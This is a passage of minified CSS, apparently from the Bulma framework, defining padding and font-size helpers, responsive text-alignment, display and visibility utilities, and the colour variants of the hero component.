.5rem!important}.pr-5{padding-right:1.5rem!important}.pb-5{padding-bottom:1.5rem!important}.pl-5{padding-left:1.5rem!important}.px-5{padding-left:1.5rem!important;padding-right:1.5rem!important}.py-5{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.p-6{padding:3rem!important}.pt-6{padding-top:3rem!important}.pr-6{padding-right:3rem!important}.pb-6{padding-bottom:3rem!important}.pl-6{padding-left:3rem!important}.px-6{padding-left:3rem!important;padding-right:3rem!important}.py-6{padding-top:3rem!important;padding-bottom:3rem!important}.p-auto{padding:auto!important}.pt-auto{padding-top:auto!important}.pr-auto{padding-right:auto!important}.pb-auto{padding-bottom:auto!important}.pl-auto{padding-left:auto!important}.px-auto{padding-left:auto!important;padding-right:auto!important}.py-auto{padding-top:auto!important;padding-bottom:auto!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width:768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width:769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width:1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width:1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and (min-width:1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}@media screen and (min-width:1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width:768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width:769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width:1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width:1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width:1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width:1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width:768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and (min-width:769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width:1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width:1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width:1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width:1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width:768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width:769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width:1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width:1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width:1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width:1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width:768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width:769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width:1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width:1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width:1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width:1408px){.has-text-right-fullhd{text-align:right!important}}.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.is-underlined{text-decoration:underline!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-secondary{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-monospace{font-family:monospace!important}.is-family-code{font-family:monospace!important}.is-block{display:block!important}@media screen and (max-width:768px){.is-block-mobile{display:block!important}}@media screen and (min-width:769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width:1023px){.is-block-touch{display:block!important}}@media screen and (min-width:1024px){.is-block-desktop{display:block!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width:1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width:1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width:768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width:769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width:1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width:1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width:1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-flex-widescreen-only{display:flex!important}}@media screen and (min-width:1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width:768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width:769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width:1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width:1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width:1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width:1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width:768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width:769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width:1023px){.is-inline-block-touch{display:inline-block!important}}@media screen and (min-width:1024px){.is-inline-block-desktop{display:inline-block!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-block-desktop-only{display:inline-block!important}}@media screen and (min-width:1216px){.is-inline-block-widescreen{display:inline-block!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-block-widescreen-only{display:inline-block!important}}@media screen and (min-width:1408px){.is-inline-block-fullhd{display:inline-block!important}}.is-inline-flex{display:inline-flex!important}@media screen and (max-width:768px){.is-inline-flex-mobile{display:inline-flex!important}}@media screen and (min-width:769px),print{.is-inline-flex-tablet{display:inline-flex!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-flex-tablet-only{display:inline-flex!important}}@media screen and (max-width:1023px){.is-inline-flex-touch{display:inline-flex!important}}@media screen and (min-width:1024px){.is-inline-flex-desktop{display:inline-flex!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-flex-desktop-only{display:inline-flex!important}}@media screen and (min-width:1216px){.is-inline-flex-widescreen{display:inline-flex!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-flex-widescreen-only{display:inline-flex!important}}@media screen and (min-width:1408px){.is-inline-flex-fullhd{display:inline-flex!important}}.is-hidden{display:none!important}.is-sr-only{border:none!important;clip:rect(0,0,0,0)!important;height:.01em!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:.01em!important}@media screen and (max-width:768px){.is-hidden-mobile{display:none!important}}@media screen and (min-width:769px),print{.is-hidden-tablet{display:none!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-hidden-tablet-only{display:none!important}}@media screen and (max-width:1023px){.is-hidden-touch{display:none!important}}@media screen and (min-width:1024px){.is-hidden-desktop{display:none!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-hidden-desktop-only{display:none!important}}@media screen and (min-width:1216px){.is-hidden-widescreen{display:none!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-hidden-widescreen-only{display:none!important}}@media screen and (min-width:1408px){.is-hidden-fullhd{display:none!important}}.is-invisible{visibility:hidden!important}@media screen and (max-width:768px){.is-invisible-mobile{visibility:hidden!important}}@media screen and (min-width:769px),print{.is-invisible-tablet{visibility:hidden!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-invisible-tablet-only{visibility:hidden!important}}@media screen and (max-width:1023px){.is-invisible-touch{visibility:hidden!important}}@media screen and (min-width:1024px){.is-invisible-desktop{visibility:hidden!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-invisible-desktop-only{visibility:hidden!important}}@media screen and (min-width:1216px){.is-invisible-widescreen{visibility:hidden!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-invisible-widescreen-only{visibility:hidden!important}}@media screen and (min-width:1408px){.is-invisible-fullhd{visibility:hidden!important}}.hero{align-items:stretch;display:flex;flex-direction:column;justify-content:space-between}.hero .navbar{background:0 0}.hero .tabs ul{border-bottom:none}.hero.is-white{background-color:#fff;color:#0a0a0a}.hero.is-white a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-white strong{color:inherit}.hero.is-white .title{color:#0a0a0a}.hero.is-white .subtitle{color:rgba(10,10,10,.9)}.hero.is-white .subtitle a:not(.button),.hero.is-white .subtitle strong{color:#0a0a0a}@media screen and (max-width:1023px){.hero.is-white .navbar-menu{background-color:#fff}}.hero.is-white .navbar-item,.hero.is-white .navbar-link{color:rgba(10,10,10,.7)}.hero.is-white .navbar-link.is-active,.hero.is-white .navbar-link:hover,.hero.is-white a.navbar-item.is-active,.hero.is-white a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.hero.is-white .tabs a{color:#0a0a0a;opacity:.9}.hero.is-white .tabs a:hover{opacity:1}.hero.is-white .tabs li.is-active a{color:#fff!important;opacity:1}.hero.is-white .tabs.is-boxed a,.hero.is-white .tabs.is-toggle a{color:#0a0a0a}.hero.is-white .tabs.is-boxed a:hover,.hero.is-white .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-white .tabs.is-boxed li.is-active a,.hero.is-white .tabs.is-boxed li.is-active a:hover,.hero.is-white .tabs.is-toggle li.is-active a,.hero.is-white .tabs.is-toggle li.is-active a:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.hero.is-white.is-bold{background-image:linear-gradient(141deg,#e6e6e6 0,#fff 71%,#fff 100%)}@media screen and (max-width:768px){.hero.is-white.is-bold .navbar-menu{background-image:linear-gradient(141deg,#e6e6e6 0,#fff 71%,#fff 100%)}}.hero.is-black{background-color:#0a0a0a;color:#fff}.hero.is-black a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-black strong{color:inherit}.hero.is-black .title{color:#fff}.hero.is-black .subtitle{color:rgba(255,255,255,.9)}.hero.is-black .subtitle a:not(.button),.hero.is-black .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-black .navbar-menu{background-color:#0a0a0a}}.hero.is-black .navbar-item,.hero.is-black .navbar-link{color:rgba(255,255,255,.7)}.hero.is-black .navbar-link.is-active,.hero.is-black .navbar-link:hover,.hero.is-black a.navbar-item.is-active,.hero.is-black a.navbar-item:hover{background-color:#000;color:#fff}.hero.is-black .tabs a{color:#fff;opacity:.9}.hero.is-black .tabs a:hover{opacity:1}.hero.is-black .tabs li.is-active a{color:#0a0a0a!important;opacity:1}.hero.is-black .tabs.is-boxed a,.hero.is-black .tabs.is-toggle a{color:#fff}.hero.is-black .tabs.is-boxed a:hover,.hero.is-black .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-black .tabs.is-boxed li.is-active a,.hero.is-black .tabs.is-boxed li.is-active a:hover,.hero.is-black .tabs.is-toggle li.is-active a,.hero.is-black .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.hero.is-black.is-bold{background-image:linear-gradient(141deg,#000 0,#0a0a0a 71%,#181616 100%)}@media screen and (max-width:768px){.hero.is-black.is-bold .navbar-menu{background-image:linear-gradient(141deg,#000 0,#0a0a0a 71%,#181616 100%)}}.hero.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.hero.is-light a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-light strong{color:inherit}.hero.is-light .title{color:rgba(0,0,0,.7)}.hero.is-light .subtitle{color:rgba(0,0,0,.9)}.hero.is-light .subtitle a:not(.button),.hero.is-light .subtitle strong{color:rgba(0,0,0,.7)}@media screen and (max-width:1023px){.hero.is-light .navbar-menu{background-color:#f5f5f5}}.hero.is-light .navbar-item,.hero.is-light .navbar-link{color:rgba(0,0,0,.7)}.hero.is-light .navbar-link.is-active,.hero.is-light .navbar-link:hover,.hero.is-light a.navbar-item.is-active,.hero.is-light a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.hero.is-light .tabs a{color:rgba(0,0,0,.7);opacity:.9}.hero.is-light .tabs a:hover{opacity:1}.hero.is-light .tabs li.is-active a{color:#f5f5f5!important;opacity:1}.hero.is-light .tabs.is-boxed a,.hero.is-light .tabs.is-toggle a{color:rgba(0,0,0,.7)}.hero.is-light .tabs.is-boxed a:hover,.hero.is-light .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-light .tabs.is-boxed li.is-active a,.hero.is-light .tabs.is-boxed li.is-active a:hover,.hero.is-light .tabs.is-toggle li.is-active a,.hero.is-light .tabs.is-toggle li.is-active a:hover{background-color:rgba(0,0,0,.7);border-color:rgba(0,0,0,.7);color:#f5f5f5}.hero.is-light.is-bold{background-image:linear-gradient(141deg,#dfd8d9 0,#f5f5f5 71%,#fff 100%)}@media screen and (max-width:768px){.hero.is-light.is-bold .navbar-menu{background-image:linear-gradient(141deg,#dfd8d9 0,#f5f5f5 71%,#fff 100%)}}.hero.is-dark{background-color:#363636;color:#fff}.hero.is-dark a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-dark strong{color:inherit}.hero.is-dark .title{color:#fff}.hero.is-dark .subtitle{color:rgba(255,255,255,.9)}.hero.is-dark .subtitle a:not(.button),.hero.is-dark .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-dark .navbar-menu{background-color:#363636}}.hero.is-dark .navbar-item,.hero.is-dark .navbar-link{color:rgba(255,255,255,.7)}.hero.is-dark .navbar-link.is-active,.hero.is-dark .navbar-link:hover,.hero.is-dark a.navbar-item.is-active,.hero.is-dark a.navbar-item:hover{background-color:#292929;color:#fff}.hero.is-dark .tabs a{color:#fff;opacity:.9}.hero.is-dark .tabs a:hover{opacity:1}.hero.is-dark .tabs li.is-active a{color:#363636!important;opacity:1}.hero.is-dark .tabs.is-boxed a,.hero.is-dark .tabs.is-toggle a{color:#fff}.hero.is-dark .tabs.is-boxed a:hover,.hero.is-dark .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-dark .tabs.is-boxed li.is-active a,.hero.is-dark .tabs.is-boxed li.is-active a:hover,.hero.is-dark .tabs.is-toggle li.is-active a,.hero.is-dark .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#363636}.hero.is-dark.is-bold{background-image:linear-gradient(141deg,#1f191a 0,#363636 71%,#46403f 100%)}@media screen and (max-width:768px){.hero.is-dark.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1f191a 0,#363636 71%,#46403f 100%)}}.hero.is-primary{background-color:#00d1b2;color:#fff}.hero.is-primary a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-primary strong{color:inherit}.hero.is-primary .title{color:#fff}.hero.is-primary .subtitle{color:rgba(255,255,255,.9)}.hero.is-primary .subtitle a:not(.button),.hero.is-primary .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-primary .navbar-menu{background-color:#00d1b2}}.hero.is-primary .navbar-item,.hero.is-primary .navbar-link{color:rgba(255,255,255,.7)}.hero.is-primary .navbar-link.is-active,.hero.is-primary .navbar-link:hover,.hero.is-primary a.navbar-item.is-active,.hero.is-primary a.navbar-item:hover{background-color:#00b89c;color:#fff}.hero.is-primary .tabs a{color:#fff;opacity:.9}.hero.is-primary .tabs a:hover{opacity:1}.hero.is-primary .tabs li.is-active a{color:#00d1b2!important;opacity:1}.hero.is-primary .tabs.is-boxed a,.hero.is-primary .tabs.is-toggle a{color:#fff}.hero.is-primary .tabs.is-boxed a:hover,.hero.is-primary .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-primary .tabs.is-boxed li.is-active a,.hero.is-primary .tabs.is-boxed li.is-active a:hover,.hero.is-primary .tabs.is-toggle li.is-active a,.hero.is-primary .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#00d1b2}.hero.is-primary.is-bold{background-image:linear-gradient(141deg,#009e6c 0,#00d1b2 71%,#00e7eb 100%)}@media screen and (max-width:768px){.hero.is-primary.is-bold .navbar-menu{background-image:linear-gradient(141deg,#009e6c 0,#00d1b2 71%,#00e7eb 100%)}}.hero.is-link{background-color:#485fc7;color:#fff}.hero.is-link a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-link strong{color:inherit}.hero.is-link .title{color:#fff}.hero.is-link .subtitle{color:rgba(255,255,255,.9)}.hero.is-link .subtitle a:not(.button),.hero.is-link .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-link .navbar-menu{background-color:#485fc7}}.hero.is-link .navbar-item,.hero.is-link .navbar-link{color:rgba(255,255,255,.7)}.hero.is-link .navbar-link.is-active,.hero.is-link .navbar-link:hover,.hero.is-link a.navbar-item.is-active,.hero.is-link a.navbar-item:hover{background-color:#3a51bb;color:#fff}.hero.is-link .tabs a{color:#fff;opacity:.9}.hero.is-link .tabs a:hover{opacity:1}.hero.is-link .tabs li.is-active a{color:#485fc7!important;opacity:1}.hero.is-link .tabs.is-boxed a,.hero.is-link .tabs.is-toggle a{color:#fff}.hero.is-link .tabs.is-boxed a:hover,.hero.is-link .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-link .tabs.is-boxed li.is-active a,.hero.is-link .tabs.is-boxed li.is-active a:hover,.hero.is-link .tabs.is-toggle li.is-active a,.hero.is-link .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#485fc7}.hero.is-link.is-bold{background-image:linear-gradient(141deg,#2959b3 0,#485fc7 71%,#5658d2 100%)}@media screen and (max-width:768px){.hero.is-link.is-bold .navbar-menu{background-image:linear-gradient(141deg,#2959b3 0,#485fc7 71%,#5658d2 100%)}}.hero.is-info{background-color:#3e8ed0;color:#fff}.hero.is-info a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-info strong{color:inherit}.hero.is-info .title{color:#fff}.hero.is-info .subtitle{color:rgba(255,255,255,.9)}.hero.is-info .subtitle a:not(.button),.hero.is-info .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-info .navbar-menu{background-color:#3e8ed0}}.hero.is-info .navbar-item,.hero.is-info .navbar-link{color:rgba(255,255,255,.7)}.hero.is-info .navbar-link.is-active,.hero.is-info .navbar-link:hover,.hero.is-info a.navbar-item.is-active,.hero.is-info a.navbar-item:hover{background-color:#3082c5;color:#fff}.hero.is-info .tabs a{color:#fff;opacity:.9}.hero.is-info .tabs a:hover{opacity:1}.hero.is-info .tabs li.is-active a{color:#3e8ed0!important;opacity:1}.hero.is-info .tabs.is-boxed a,.hero.is-info .tabs.is-toggle a{color:#fff}.hero.is-info .tabs.is-boxed a:hover,.hero.is-info .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-info .tabs.is-boxed li.is-active a,.hero.is-info .tabs.is-boxed li.is-active a:hover,.hero.is-info .tabs.is-toggle li.is-active a,.hero.is-info .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3e8ed0}.hero.is-info.is-bold{background-image:linear-gradient(141deg,#208fbc 0,#3e8ed0 71%,#4d83db 100%)}@media screen and (max-width:768px){.hero.is-info.is-bold .navbar-menu{background-image:linear-gradient(141deg,#208fbc 0,#3e8ed0 71%,#4d83db 100%)}}.hero.is-success{background-color:#48c78e;color:#fff}.hero.is-success a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-success strong{color:inherit}.hero.is-success .title{color:#fff}.hero.is-success .subtitle{color:rgba(255,255,255,.9)}.hero.is-success .subtitle a:not(.button),.hero.is-success .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-success .navbar-menu{background-color:#48c78e}}.hero.is-success .navbar-item,.hero.is-success .navbar-link{color:rgba(255,255,255,.7)}.hero.is-success .navbar-link.is-active,.hero.is-success .navbar-link:hover,.hero.is-success a.navbar-item.is-active,.hero.is-success a.navbar-item:hover{background-color:#3abb81;color:#fff}.hero.is-success .tabs a{color:#fff;opacity:.9}.hero.is-success .tabs a:hover{opacity:1}.hero.is-success .tabs li.is-active a{color:#48c78e!important;opacity:1}.hero.is-success .tabs.is-boxed a,.hero.is-success .tabs.is-toggle a{color:#fff}.hero.is-success .tabs.is-boxed a:hover,.hero.is-success .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-success .tabs.is-boxed li.is-active a,.hero.is-success .tabs.is-boxed li.is-active a:hover,.hero.is-success .tabs.is-toggle li.is-active a,.hero.is-success .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#48c78e}.hero.is-success.is-bold{background-image:linear-gradient(141deg,#29b35e 0,#48c78e 71%,#56d2af 100%)}@media screen and (max-width:768px){.hero.is-success.is-bold .navbar-menu{background-image:linear-gradient(141deg,#29b35e 0,#48c78e 71%,#56d2af 100%)}}.hero.is-warning{background-color:#ffe08a;color:rgba(0,0,0,.7)}.hero.is-warning a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-warning strong{color:inherit}.hero.is-warning .title{color:rgba(0,0,0,.7)}.hero.is-warning .subtitle{color:rgba(0,0,0,.9)}.hero.is-warning .subtitle a:not(.button),.hero.is-warning .subtitle strong{color:rgba(0,0,0,.7)}@media screen and (max-width:1023px){.hero.is-warning .navbar-menu{background-color:#ffe08a}}.hero.is-warning .navbar-item,.hero.is-warning .navbar-link{color:rgba(0,0,0,.7)}.hero.is-warning .navbar-link.is-active,.hero.is-warning .navbar-link:hover,.hero.is-warning a.navbar-item.is-active,.hero.is-warning a.navbar-item:hover{background-color:#ffd970;color:rgba(0,0,0,.7)}.hero.is-warning .tabs a{color:rgba(0,0,0,.7);opacity:.9}.hero.is-warning .tabs a:hover{opacity:1}.hero.is-warning .tabs li.is-active a{color:#ffe08a!important;opacity:1}.hero.is-warning .tabs.is-boxed a,.hero.is-warning .tabs.is-toggle a{color:rgba(0,0,0,.7)}.hero.is-warning .tabs.is-boxed a:hover,.hero.is-warning .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-warning .tabs.is-boxed li.is-active a,.hero.is-warning .tabs.is-boxed li.is-active a:hover,.hero.is-warning .tabs.is-toggle li.is-active a,.hero.is-warning .tabs.is-toggle li.is-active a:hover{background-color:rgba(0,0,0,.7);border-color:rgba(0,0,0,.7);color:#ffe08a}.hero.is-warning.is-bold{background-image:linear-gradient(141deg,#ffb657 0,#ffe08a 71%,#fff6a3 100%)}@media screen and (max-width:768px){.hero.is-warning.is-bold .navbar-menu{background-image:linear-gradient(141deg,#ffb657 0,#ffe08a 71%,#fff6a3 100%)}}.hero.is-danger{background-color:#f14668;color:#fff}.hero.is-danger a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-danger strong{color:inherit}.hero.is-danger .title{color:#fff}.hero.is-danger .subtitle{color:rgba(255,255,255,.9)}.hero.is-danger .subtitle a:not(.button),.hero.is-danger .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-danger .navbar-menu{background-color:#f14668}}.hero.is-danger .navbar-item,.hero.is-danger .navbar-link{color:rgba(255,255,255,.7)}.hero.is-danger .navbar-link.is-active,.hero.is-danger .navbar-link:hover,.hero.is-danger a.navbar-item.is-active,.hero.is-danger a.navbar-item:hover{background-color:#ef2e55;color:#fff}.hero.is-danger .tabs a{color:#fff;opacity:.9}.hero.is-danger .tabs a:hover{opacity:1}.hero.is-danger .tabs li.is-active a{color:#f14668!important;opacity:1}.hero.is-danger .tabs.is-boxed a,.hero.is-danger .tabs.is-toggle a{color:#fff}.hero.is-danger .tabs.is-boxed a:hover,.hero.is-danger .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-danger .tabs.is-boxed li.is-active a,.hero.is-danger .tabs.is-boxed li.is-active a:hover,.hero.is-danger .tabs.is-toggle li.is-active a,.hero.is-danger .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#f14668}.hero.is-danger.is-bold{background-image:linear-gradient(141deg,#fa0a62 0,#f14668 71%,#f7595f 100%)}@media screen and (max-width:768px){.hero.is-danger.is-bold .navbar-menu{background-image:linear-gradient(141deg,#fa0a62 0,#f14668 71%,#f7595f 100%)}}.hero.is-small .hero-body{padding:1.5rem}@media screen and (min-width:769px),print{.hero.is-medium .hero-body{padding:9rem 4.5rem}}@media screen and (min-width:769px),print{.hero.is-large .hero-body{padding:18rem 6rem}}.hero.is-fullheight .hero-body,.hero.is-fullheight-with-navbar .hero-body,.hero.is-halfheight .hero-body{align-items:center;display:flex}.hero.is-fullheight .hero-body>.container,.hero.is-fullheight-with-navbar .hero-body>.container,.hero.is-halfheight .hero-body>.container{flex-grow:1;flex-shrink:1}.hero.is-halfheight{min-height:50vh}.hero.is-fullheight{min-height:100vh}.hero-video{overflow:hidden}.hero-video video{left:50%;min-height:100%;min-width:100%;position:absolute;top:50%;transform:translate3d(-50%,-50%,0)}.hero-video.is-transparent{opacity:.3}@media screen and (max-width:768px){.hero-video{display:none}}.hero-buttons{margin-top:1.5rem}@media screen and (max-width:768px){.hero-buttons .button{display:flex}.hero-buttons .button:not(:last-child){margin-bottom:.75rem}}@media screen and (min-width:769px),print{.hero-buttons{display:flex;justify-content:center}.hero-buttons .button:not(:last-child){margin-right:1.5rem}}.hero-foot,.hero-head{flex-grow:0;flex-shrink:0}.hero-body{flex-grow:1;flex-shrink:0;padding:3rem 1.5rem}@media screen and (min-width:769px),print{.hero-body{padding:3rem 